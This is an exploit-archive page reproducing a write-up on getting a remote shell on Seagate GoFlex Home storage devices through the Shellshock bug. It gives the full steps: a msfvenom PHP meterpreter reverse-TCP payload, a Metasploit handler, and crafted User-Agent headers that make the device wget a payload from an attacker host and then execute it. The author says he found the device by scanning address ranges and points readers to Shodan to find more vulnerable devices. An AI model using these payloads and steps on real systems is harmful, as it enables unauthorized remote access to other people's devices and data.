what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Seagate GoFlex Remote Shell

Seagate GoFlex Remote Shell
Posted Nov 15, 2015
Authored by Anarchy Angel

This is a write up on how to grab a remote shell on Seagate GoFlex home network storage systems.

tags | exploit, remote, shell
SHA-256 | 04bf562e369912c73eb24b90c98f964884eda934bddada9642ca661da0e97ca7

Seagate GoFlex Remote Shell

Change Mirror Download
I have been scanning some ranges in my free time and came across a Seagate
GoFlex Home Network Storage System which my scanner flagged as being
vulnerable to shellshock but getting a remote shell was no easy task "for
me anyway". I ended up having to build a payload with msfvenom and doing
the execution using burp suite and handling the shell with metasploit
handler. The best part is this device uses UPNP to tunnel to the Internet,
giving us easy access >;)

Start with the payload:

msfvenom -p php/meterpreter/reverse_tcp lport=4444 lhost=1.2.3.4 >msf.txt


Now upload msf.txt to your web server. After the payload is uploaded open
metasploit and

use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
> run


That should start up our listener. Now we need to open up burp and use the
repeater. Enter the following for the request:

GET /support/ HTTP/1.1
> Host: 5.6.7.8
> User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;
> PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget
> http://1.2.3.4/msf.txt -O /tmp/msf.php2>&1;
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Connection: keep-alive


Also don't forget to configure the target correctly. Hit go and wait a few
seconds and you should see some wget output and if all went well you should
now have uploaded msf.php to the /tmp/ dir of the device. Now we just need
to execute it. For this we use burp again. This time put this in the
request:

GET /support/ HTTP/1.1
> Host: 5.6.7.8
> User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;
> PATH=/usr/bin:/usr/local/bin:/bin; export PATH; php /tmp/msf.php;
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Connection: keep-alive


This time when you hit Go, and your ports are forwarded correctly, you
should be able to go back to our msfconsole window and see a session has
opened. You wont have root at this point but you can still do a lot of fun
stuff. You can find some of these devices on Shodan by searching for
"hipname=". If anyone figures out how to get root please share :) Enjoy!

*Count of vulnerable devices taken from Shodan search results, not actual
testing.
**I did not test it but you could try to use linux/x86/exec payload in bash
bug exploit module to deploy and execute. This would allow you to keep it
all in metasploit.

Original post -
http://aahideaway.blogspot.com/2015/11/getting-remote-shell-on-any-one-of.html
Check it out for more information on this and other posts.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close